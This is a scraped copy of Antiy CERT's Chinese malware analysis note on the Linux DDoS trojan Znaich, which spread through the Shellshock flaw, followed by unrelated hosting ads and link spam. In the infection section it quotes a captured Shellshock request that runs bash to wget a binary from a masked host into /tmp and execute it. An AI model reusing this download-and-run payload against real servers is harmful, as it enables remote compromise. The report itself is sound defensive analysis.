Trojan[DDOS]/Linux.

pastebin.com  时间:2021-04-05  阅读:()
Znaich分析笔记安天安全研究与应急处理中心(AntiyCERT)Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第2页目录编者按.
11概述.
12感染源.
13样本分析.
34总结.
7附录一:参考资料.
7附录二:关于安天.
7Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第1页编者按安天CERT这篇分析笔记完成于2015年1月18日,但撰写后并未公开,为让安全工作者更进一步了解IoT僵尸网络的威胁,安天CERT决定公开本报告,作为《IOT僵尸网络严重威胁网络基础设施安全》一文的参考资料.
1概述安天CERT关注到近期针对Linux平台的木马十分活跃.
2015年1月13日,MalwareMustDie的日本工作人员HendrikAdrian在推特上发出其分析样本的截图,在1月14日MalwareMustDie官网博客发出分析报告.
有趣的是,同是在1月14日,HendrikAdrian发推表示XOR.
DDoS又回来了,该家族早在2014年9月就已经出现,但也有安全媒体发表文章却称该恶意代码是"新型木马",Avast的报告中也说明了XOR.
DDoS自2014年9月末就已经出现,因此可以得出"新型木马的结论"声音并没有对此事件进行深入研究.
从各方报告来看,1月13日出现的样本与1月14日出现的XOR.
DDoS样本没有关联,下面对1月13日出现的样本进行分析.
2感染源该恶意代码在2015年1月13日被发现,通过"破壳"漏洞进行攻击,根据MalwareMustDie的报告,以下是被检测到的攻击代码:[13/Jan/2015:06:07:18+0100]"GET/HTTP/1.
1"200311bin/bash-c\"rm-rf/tmp/*;echowgethttp://xxxx:81/9521-O/tmp/China.
Z-gxak\x80>>/tmp/Run.
sh;echoechoByChina.
Z>>/tmp/Run.
sh;echochmod777/tmp/China.
Z-gxak\x80>>/tmp/Run.
sh;echo/tmp/China.
Z-gxak\x80>>/tmp/Run.
sh;echorm-rf/tmp/Run.
sh>>/tmp/Run.
sh;chmod777/tmp/Run.
sh;/tmp/Run.
sh\""它利用"破壳"漏洞下载文件至/tmp文件夹中,通过sh脚本运行.
在2015年1月14日MalwareMustDie的报告中,该C&C服务器包含9521及ck.
exe两个文件:Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第2页而在1月16日下午13:19:49秒时,文件已经被替换:Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第3页从截图上看,有359人下载了名为9521的恶意代码.
而另一个名为ck.
exe的文件则是一个漏洞扫描器,恶意代码通过它进行传播.
3样本分析首先分析样本ck.
exe:原始文件名ck.
exeMD54E337BE817E4A667FA695E7980B8B851处理器架构X86-32文件大小1.
7MB(1816064bytes)文件格式BinExecute/Microsoft:EXE[:X86]时间戳2014-11-0804:09:02数字签名NO加壳类型无编译语言MicrosoftVisualC++VT首次上传时间2015-01-1308:05:48VT检测结果5/57病毒名称Trojan/Linux.
ShellShock判定结果恶意Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第4页1、运行后会弹出帮助可以看出,它有三个参数:HostFile、Threads、Address,HostFile为txt格式,内容为扫描的目标ip地址,Threads则是线程数量,Address就是恶意代码的地址.
2、对其反汇编,发现了MalwareMustDie报告中提到了攻击代码,可以看出,该样本扫描有"破壳"漏洞的机器,下载恶意代码并运行下面分析载荷文件9521:原始文件名9521MD5B7E3CA05806AA99CAD9D3768FF90F1D9处理器架构X86-32文件大小604.
4KB(618948bytes)文件格式BinExecute/ELF[:X86]数字签名NO加壳类型无VT首次上传时间2015-01-1306:04:59VT检测结果17/55病毒名称Trojan[DDOS]/Linux.
Znaich判定结果恶意1、样本运行后首先获取系统信息,包括系统版本(通过调用uname())系统时间(调用gettimeofday())Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第5页CPU核心数量及时钟频率(取自/proc/cpuinfo)CPU负载(取自/proc/stat)空闲内存大小及内存总量(取自/proc/meminfo)2、修改rc.
local(利用sed命令):删除末尾的exit0在第二行增加字符串"//ChinaZ"3、解密硬编码的C&C服务器地址Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第6页4、与C&C服务器通信,将之前获取的系统信息通过TCP数据包进行发送5、使用Keep-alive机制检测C&C服务器是否存活Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第7页4总结该样本通过"破壳"漏洞进行传播,为常见的DDOS攻击样本.
但扫描器时间戳为2014年11月,并且攻击者重新上传的样本文件也为2014年的DDOS攻击样本,说明该作者一直在利用"破壳"漏洞进行攻击.
附录一:参考资料[1]来源:MalwareMustDiehttp://blog.
malwaremustdie.
org/2015/01/mmd-0030-2015-new-elf-malware-on.
htmlhttp://pastebin.
com/raw.
phpi=gf4xrB9n[2]来源:KernerMode.
infohttp://www.
kernelmode.
info/forum/viewtopic.
phpf=16&t=3682&sid=7984f41ec2f98ab870c5a613a116d99e附录二:关于安天安天从反病毒引擎研发团队起步,目前已发展成为以安天实验室为总部,以企业安全公司、移动安全公司为两翼的集团化安全企业.
安天始终坚持以安全保障用户价值为企业信仰,崇尚自主研发创新,在安全检测引擎、移动安全、网络协议分析还原、动态分析、终端防护、虚拟化安全等方面形成了全能力链布局.
安天的监控预警能力覆盖全国、产品与服务辐射多个国家.
安天将大数据分析、安全可视化等方面的技术与产品体系有效结合,以海量样本自动化分析平台延展工程师团队作业能力、缩短产品响应周期.
结Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第8页合多年积累的海量安全威胁知识库,综合应用大数据分析、安全可视化等方面经验,推出了应对高级持续性威胁(APT)和面向大规模网络与关键基础设施的态势感知与监控预警解决方案.
全球超过三十家以上的著名安全厂商、IT厂商选择安天作为检测能力合作伙伴,安天的反病毒引擎得以为全球近十万台网络设备和网络安全设备、近两亿部手机提供安全防护.
安天移动检测引擎是全球首个获得AV-TEST年度奖项的中国产品.
安天技术实力得到行业管理机构、客户和伙伴的认可,安天已连续四届蝉联国家级安全应急支撑单位资质,亦是中国国家信息安全漏洞库六家首批一级支撑单位之一.
安天是中国应急响应体系中重要的企业节点,在红色代码、口令蠕虫、震网、破壳、沙虫、方程式等重大安全事件中,安天提供了先发预警、深度分析或系统的解决方案.
关于反病毒引擎更多信息请访问:http://www.
antiy.
com(中文)http://www.
antiy.
net(英文)安天企业安全公司更多信息请访问:http://www.
antiy.
cn安天移动安全公司(AVLTEAM)更多信息请访问:http://www.
avlsec.
com

美国高防云服务器 1核 1G 26元/月 香港/日本站群服务器 E5 16G 1600元/月 触摸云

触摸云国内IDC/ISP资质齐全商家,与香港公司联合运营, 已超8年运营 。本次为大家带来的是双12特惠活动,美国高防|美国大宽带买就可申请配置升档一级[CPU内存宽带流量选一]升档方式:CPU内存宽带流量任选其一,工单申请免费升级一档珠海触摸云科技有限公司官方网站:https://cmzi.com/可新购免费升档配置套餐:地区CPU内存带宽数据盘价格购买地址美国高防 1核 1G10M20G 26...

Sharktech:美国/荷兰独立服务器,10Gbps端口/不限流量/免费DDoS防护60G,319美元/月起

sharktech怎么样?sharktech (鲨鱼机房)是一家成立于 2003 年的知名美国老牌主机商,又称鲨鱼机房或者SK 机房,一直主打高防系列产品,提供独立服务器租用业务和 VPS 主机,自营机房在美国洛杉矶、丹佛、芝加哥和荷兰阿姆斯特丹,所有产品均提供 DDoS 防护。此文只整理他们家10Gbps专用服务器,此外该系列所有服务器都受到高达 60Gbps(可升级到 100Gbps)的保护。...

趣米云(18元/月)香港三网CN2云服器低至;1核1G/30G系统盘+20G数据盘/10M带宽

趣米云怎么样?趣米云是创建于2021年的国人IDC商家,虽然刚刚成立,但站长早期为3家IDC提供技术服务,已从业2年之久,目前主要从事出售香港vps、香港独立服务器、香港站群服务器等,目前在售VPS线路有三网CN2、CN2 GIA,该公司旗下产品均采用KVM虚拟化架构。由于内存资源大部分已售,而IP大量闲置,因此我们本月新增1c1g优惠套餐。点击进入:趣米云官方网站地址香港三网CN2云服务器机型活...

pastebin.com为你推荐
硬盘工作原理硬盘的读写原理安徽汽车网中国汽车十大品牌lunwenjiance知网论文检测查重系统嘀动网动网和爱动网各自的优势是什么?同ip域名不同的几个ip怎样和同一个域名对应上www.765.com下载小说地址www.7788dy.comwww.tom365.com这个免费的电影网站有毒吗?www.1diaocha.com请问网络上可以做兼职赚钱吗?现在骗子比较多,不敢盲目相信。请大家推荐下朴容熙这个人男的女的,哪国人。叫什么。月风随笔享受生活作文600字
双线虚拟主机 域名交易 东莞服务器租用 工信部域名备案查询 工信部域名备案 淘宝抢红包攻略 域名优惠码 phpmyadmin配置 如何安装服务器系统 最漂亮的qq空间 沈阳主机托管 电信网络测速器 php服务器 阿里云邮箱申请 卡巴斯基试用版下载 广州主机托管 酷锐 qq空间打开很慢 西部数码主机 vpsaa 更多